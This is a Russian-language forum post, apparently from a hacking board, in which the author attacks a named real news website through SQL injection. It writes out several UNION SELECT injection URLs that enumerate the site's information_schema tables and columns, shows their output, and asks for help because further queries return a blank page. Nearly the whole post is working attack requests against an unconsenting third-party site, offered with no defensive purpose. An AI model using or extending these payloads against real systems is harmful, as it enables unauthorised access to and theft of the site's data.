Сайт вида:
http://www.volga-astrakhan.ru/index.php3?act=paper&n=25125
Нашел уязвимость, подобрал число колонок. Версия 5.0.45-community, значит есть возможность узнать имена всех таблиц и колонок. Вообщем получился запрос такого вида:
http://www.volga-astrakhan.ru/index.php3?act=paper&n=25125%20and%201=0%20union%2 0select%201,2,table_name,4,5%20from%20Information_ schema.tables limit 0,1--
Вывелось название первой таблицы:
CHARACTER_SETS
Формируем следующий запрос:
http://www.volga-astrakhan.ru/index.php3?act=paper&n=25125%20and%201=0%20union%2 0select%201,2,column_name,4,5%20from%20Information _schema.columns%20where%20table_name='CHARACTER_SE TS' limit 0,1--
Вывелось название первой колонки в этой таблице:
CHARACTER_SET_NAME
Но когда я пишу и имя таблици и колонки, или даже просто таблици, ну например:

http://www.volga-astrakhan.ru/index.php3?act=paper&n=25125%20and%201=0%20union%2 0select%201,2,CHARACTER_SET_NAME,4,5%20from%20CHAR ACTER_SET--

либо:

http://www.volga-astrakhan.ru/index.php3?act=paper&n=25125%20and%201=0%20union%2 0select%201,2,3,4,5%20from%20CHARACTER_SET--

выводится пустая страница...